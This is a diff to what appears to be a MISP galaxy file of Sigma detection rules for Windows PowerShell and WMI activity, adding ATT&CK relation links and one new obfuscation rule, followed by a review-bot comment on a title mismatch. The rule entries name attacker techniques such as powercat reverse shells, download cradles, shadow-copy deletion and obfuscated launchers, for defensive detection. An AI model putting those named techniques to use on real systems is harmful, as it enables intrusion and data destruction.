@@ -17339,9 +21517,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
 "https://twitter.com/oulusoyum/status/1191329746069655553",
 "https://twitter.com/mattifestation/status/1196390321783025666",
- "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml"
 ],
 "tags": [
@@ -17351,6 +21529,22 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf",
 "value": "Time Travel Debugging Utility Usage - Image"
 },
@@ -17401,6 +21595,22 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "value": "Suspicious Encoded Scripts in a WMI Consumer" }, @@ -17424,6 +21634,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", "value": "WMI Event Subscription" }, @@ -17440,9 +21659,9 @@ "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/RiccardoAncarani/LiquidSnake", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ @@ -17450,6 +21669,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "value": "Suspicious Scripting in a WMI Consumer" }, 
@@ -17466,8 +21694,8 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/besimorhino/powercat", "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], @@ -17476,6 +21704,15 @@ "attack.t1095" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", "value": "Netcat The Powershell Version" }, @@ -17493,8 +21730,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/bohops/WSMan-WinRM", - "https://twitter.com/chadtilbury/status/1275851297770610688", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://twitter.com/chadtilbury/status/1275851297770610688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ @@ -17504,6 +21741,22 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "value": "Suspicious Non PowerShell WSMAN COM Provider" }, 
@@ -17528,6 +21781,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", "value": "Use Get-NetTCPConnection" }, @@ -17554,6 +21816,22 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", "value": "Remote PowerShell Session (PS Classic)" }, @@ -17579,6 +21857,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "value": "PowerShell Called from an Executable Version Mismatch" }, @@ -17604,6 +21891,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" }, @@ -17630,6 +21926,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", "value": "Alternate PowerShell Hosts" }, 
@@ -17655,6 +21960,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6331d09b-4785-4c13-980f-f96661356249", "value": "PowerShell Downgrade Attack - PowerShell" }, @@ -17680,6 +21994,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", "value": "Delete Volume Shadow Copies Via WMI With PowerShell" }, @@ -17704,6 +22027,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" }, @@ -17728,6 +22060,15 @@ "attack.t1074.001" ] }, + "related": [ + { + "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" }, @@ -17752,6 +22093,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "value": "Suspicious PowerShell Download" }, 
@@ -17776,6 +22126,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "value": "Renamed Powershell Under Powershell Channel" }, @@ -17824,6 +22183,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "value": "Nslookup PowerShell Download Cradle" }, @@ -17850,6 +22218,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", "value": "Alternate PowerShell Hosts - PowerShell Module" }, @@ -17876,6 +22253,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module" }, @@ -17892,9 +22278,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://www.mdeditor.tw/pl/pgRt", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ 
@@ -17902,6 +22288,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "value": "Bad Opsec Powershell Code Artifacts" }, @@ -17952,6 +22347,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", "value": "PowerShell Decompress Commands" }, @@ -17976,6 +22380,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" }, @@ -18002,6 +22415,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module" }, @@ -18028,6 +22450,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module" }, 
@@ -18052,6 +22483,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "value": "Suspicious Get Local Groups Information" }, @@ -18077,6 +22517,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", "value": "Suspicious Get-ADDBAccount Usage" }, @@ -18093,8 +22542,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/besimorhino/powercat", "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" ], @@ -18103,6 +22552,15 @@ "attack.t1095" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", "value": "Netcat The Powershell Version - PowerShell Module" }, @@ -18127,6 +22585,15 @@ "attack.t1070.003" ] }, + "related": [ + { + "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", "value": "Clear PowerShell History - PowerShell Module" }, 
@@ -18153,6 +22620,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2f211361-7dce-442d-b78a-c04039677378", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module" }, @@ -18179,6 +22655,22 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", "value": "Remote PowerShell Session (PS Module)" }, @@ -18203,6 +22695,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6942bd25-5970-40ab-af49-944247103358", "value": "Suspicious Get Information for SMB Share - PowerShell Module" }, @@ -18229,6 +22730,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module" }, @@ -18255,6 +22765,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module" }, 
@@ -18278,6 +22797,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", "value": "Suspicious PowerShell Download - PowerShell Module" }, @@ -18304,6 +22832,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "value": "Invoke-Obfuscation Via Stdin - PowerShell Module" }, @@ -18330,6 +22867,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module" }, @@ -18353,6 +22899,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" }, @@ -18377,6 +22932,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" }, 
@@ -18403,6 +22967,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module" }, @@ -18429,6 +23002,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module" }, @@ -18452,6 +23034,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" }, @@ -18502,6 +23093,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" }, @@ -18526,6 +23126,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "value": "Use Get-NetTCPConnection - PowerShell Module" }, 
@@ -18552,6 +23161,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module" }, @@ -18576,6 +23194,15 @@ "attack.t1074.001" ] }, + "related": [ + { + "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" }, @@ -18600,6 +23227,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", "value": "Change User Agents with WebRequest" }, @@ -18624,6 +23260,15 @@ "attack.t1027.009" ] }, + "related": [ + { + "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "value": "Powershell Token Obfuscation - Powershell" }, 
@@ -18649,11 +23294,20 @@ "attack.t1546" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", "value": "Suspicious Get-WmiObject" }, { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", "meta": { "author": "James Pemberton / @4A616D6573", "creation_date": "2019/10/24", @@ -18674,8 +23328,17 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", - "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" + "value": "Usage Of Web Request Commands And Cmdlets - ScriptBlock" }, { "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", @@ -18698,6 +23361,15 @@ "attack.t1556.002" ] }, + "related": [ + { + "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "value": "Powershell Install a DLL in System Directory" }, @@ -18722,6 +23394,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", "value": "PowerShell WMI Win32_Product Install MSI" }, 
@@ -18748,6 +23429,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell" }, @@ -18773,6 +23463,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "value": "PowerShell Remote Session Creation" }, @@ -18821,6 +23520,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" }, @@ -18845,6 +23553,15 @@ "attack.t1564.003" ] }, + "related": [ + { + "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", "value": "Suspicious PowerShell WindowStyle Option" }, 
@@ -18861,8 +23578,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], @@ -18871,6 +23588,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "78aa1347-1517-4454-9982-b338d6df8343", "value": "Powershell MsXml COM Object" }, @@ -18896,6 +23622,15 @@ "attack.t1497.001" ] }, + "related": [ + { + "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", "value": "Powershell Detect Virtualization Environment" }, 
@@ -18922,9 +23657,53 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell" }, + { + "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_alias_obfscuation.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1027", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", + "value": "Potential PowerShell Obfuscation Using Character Join" + }, { "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", "meta": { @@ -18938,10 +23717,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://adsecurity.org/?p=2277", "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://adsecurity.org/?p=2277", + "https://thedfirreport.com/2020/10/08/ryuks-return", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ 
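Review bot: The newly added entry's `value` ("Potential PowerShell Obfuscation Using Character Join") does not match its `description` ("… to obfscuate Alias creation") or its `filename` (`posh_ps_susp_alias_obfscuation.yml`), so a reader cannot tell from the cluster which technique the rule actually covers; `obfscuate`/`obfscuation` also reads as a typo. If description, filename and title are copied verbatim from the upstream Sigma rule, the mismatch should be raised there rather than patched in this generated entry, but it is worth confirming before the cluster ships. The `refs` list of the same entry also carries the non-URL string `"Internal Research"` alongside URLs, which consumers that render refs as links may handle poorly; the other entries in this hunk keep refs URL-only.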
